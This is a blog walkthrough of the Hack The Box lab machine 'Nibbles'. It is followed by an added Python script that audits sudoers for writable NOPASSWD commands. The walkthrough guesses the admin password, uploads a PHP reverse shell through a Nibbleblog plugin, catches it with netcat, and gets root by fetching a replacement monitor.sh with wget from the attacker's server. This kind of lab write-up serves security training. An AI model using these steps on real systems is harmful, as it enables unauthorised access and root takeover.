Hack The Box: Nibbles Walkthrough without Metasploit

m4nnd4rk, Mar 21, 2021

Nibbles is an easy machine on Hack The Box, and it is a confidence booster for a novice like me.

Every time you start a box, keep in mind to push your own limits before taking help from the internet and other write-ups.

Let’s play with Nibbles and perform the exploitation without using Metasploit.

Machine: Nibbles
OS: Linux
IP: 10.10.10.75

Enumeration

As usual, we will start with our enumeration script. I have heard about tools like AutoRecon, but I haven’t used it yet (I may use it sometime when it is really needed).

Don’t forget to give executable permission to the script.

chmod +x en.sh

en.sh

en.sh results

Points to consider:

  1. SSH on port 22: OpenSSH 7.2p2 (I have seen this version many times, and I remember we have a user-enumeration script for it.)
  2. HTTP on port 80: Apache 2.4.18 (also common; DirBuster is the go-to tool for this.)

So our starting point for now is DirBuster.

Meanwhile, let’s go and check the website itself in the browser.

http://10.10.10.75:80

Nothing…!!

But I do remember that our professor used to give this type of CTF in the classroom. Whenever an image, text, white space or a blank page appeared, we would go to the page source to find the hints there.

Here we go,

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Some questions may arise, like why only this time we went ahead and looked at the page source and not every other time. These questions are totally valid in one sense, but in the other scenarios we already had something to move our process ahead.

Also, if you are the kind of person who always has these questions, like me, just add this step to your HTTP enumeration sheet and do it every time, regardless of whether it is needed or not.

Also, I didn’t find any directories or files with DirBuster.

For now, let’s go and see what’s there in the directory /nibbleblog.

Directed to this webpage, I tried clicking on some categories in the hope of finding something, but nothing worked. In the bottom right corner “Powered by Nibbleblog” was written. I tried searching for it on the Internet.

nibbleblog.com

Points to consider for Nibbleblog:

  1. Open source and used to create blogs.
  2. Needs PHP to work (that means PHP is already there).
  3. Websites generally list their latest version for download, and here it is v4.0.5 (so the version installed will be equal to or lower than 4.0.5).

Let’s enumerate the /nibbleblog/ directory further…

Let’s try and see “admin.php”.

Directed to this page, we need a username and password…

Let’s start with the common ones…

Nothing worked. We should also try nibbles as the username or password, but before that let’s search the Internet for two things:

  1. The default username and password for Nibbleblog.
  2. An exploit for Nibbleblog (we need to find its version first).

Let’s go to the README file we found earlier.

Finally, we got the version at least…

Exploitation

Let’s find an exploit for Nibbleblog v4.0.3.

Got one exploit, but we still need a username and password to enter the page, and they must be admin credentials.

Also, it seems to be PHP code execution, and we have a script for that in /usr/share/webshells/php/.

This is the interesting part… the more you play, the more you will know what to look for and where. You don’t have to Google everything once you have enough practice.

Let’s try nibbles as the admin password…

Thank god…!! admin / nibbles worked.

Let’s follow the directions given on the exploit page…

Go to Plugins → My image → upload the PHP reverse shell there…

Don’t forget to change the IP and port number in the reverse shell script.

Browse → upload the PHP file → Save changes

Ignore the warnings…

Set up a Netcat listener on your attacking machine… and browse to the location where the file was uploaded.

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

Let’s upgrade the shell to a TTY using pty.

python3 -c 'import pty; pty.spawn("/bin/bash")'

According to this, we can run monitor.sh without the root password.

Here personal.zip is present; unzip it and we find monitor.sh inside. It contains some health-detection metrics and whatnot, which are of no use to us, but we can change the content of the file to gain a root shell.

Add the code below to a file and name it monitor.sh:

#!/bin/sh
bash

Now we need to download this file onto the victim’s machine, replace the original with it, and execute it.

  1. Remove the file monitor.sh from /home/nibbler/personal/stuff/.
  2. Host a Python web server on your attacking machine:

python -m SimpleHTTPServer 8000

  3. Go to /tmp on the victim’s machine and use the command below to download the payload file (the address is that of your attacking machine, where the Python server is running, not the target’s):

wget http://<your-attacking-machine-ip>:8000/monitor.sh

  4. Move the monitor.sh file to /home/nibbler/personal/stuff/.
  5. Don’t forget to give monitor.sh executable permission:

chmod +x monitor.sh

  6. Run ./monitor.sh

Hey There, Root
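From the defender’s side, the root step above works because a script the user may run as root without a password lives in a location that user can write to. The following is an added example, not code from the write-up, that audits sudoers user specs for exactly that pattern; it assumes the box’s rule is a sudoers NOPASSWD entry, handles only a simplified sudoers subset (no aliases or line continuations), and uses a constructed sudoers sample and a constructed permission map in place of the live filesystem.

```python
"""Audit sudoers user specs for NOPASSWD commands the user could rewrite (added example)."""
import os
import re

# user host=(runas) [TAG:] cmd [args], ...  -- simplified grammar: no aliases or continuations
_RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<body>.*)$")

def parse_user_specs(text):
    """Return (user, nopasswd, command_path) for each command granted in a user spec."""
    specs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias")):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        nopasswd = False  # a tag sticks to its command and the following ones until overridden
        for cmd in m.group("body").split(","):
            cmd = cmd.strip()
            while ":" in cmd and cmd.split(":", 1)[0].strip().isupper():  # strip leading TAG:
                tag, cmd = (part.strip() for part in cmd.split(":", 1))
                if tag in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag == "NOPASSWD"
            specs.append((m.group("user"), nopasswd, cmd.split()[0] if cmd else ""))
    return specs

def risky_nopasswd(text, user, is_writable=lambda p: os.access(p, os.W_OK)):
    """NOPASSWD commands for `user` whose file or parent directory is writable. A writable
    parent is enough: the script can be deleted and replaced, as done with monitor.sh above.
    is_writable is injectable so a copied sudoers can be checked against a recorded map."""
    findings = []
    for spec_user, nopasswd, cmd in parse_user_specs(text):
        if spec_user != user or not nopasswd or not cmd:
            continue
        if cmd == "ALL":
            findings.append((cmd, "unrestricted NOPASSWD"))
        elif is_writable(cmd):
            findings.append((cmd, "file writable"))
        elif is_writable(os.path.dirname(cmd)):
            findings.append((cmd, "parent directory writable"))
    return findings

# Constructed sample: a rule like the box's, plus two that must not be flagged.
SAMPLE_SUDOERS = """Defaults env_reset
root ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
nibbler ALL=(root) NOPASSWD: /usr/bin/systemctl restart apache2, PASSWD: /bin/ls"""
# Constructed permission map standing in for os.access on the target host.
SAMPLE_WRITABLE = {"/home/nibbler/personal/stuff", "/home/nibbler/personal/stuff/monitor.sh"}.__contains__
```

Run it against a real host with the default `is_writable` as the user in question; the fix for a hit is to make the script and its directory root-owned and non-writable, or to drop the NOPASSWD rule.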

Thank you for finding this helpful.

Please click on clap button if you learn anything new today.
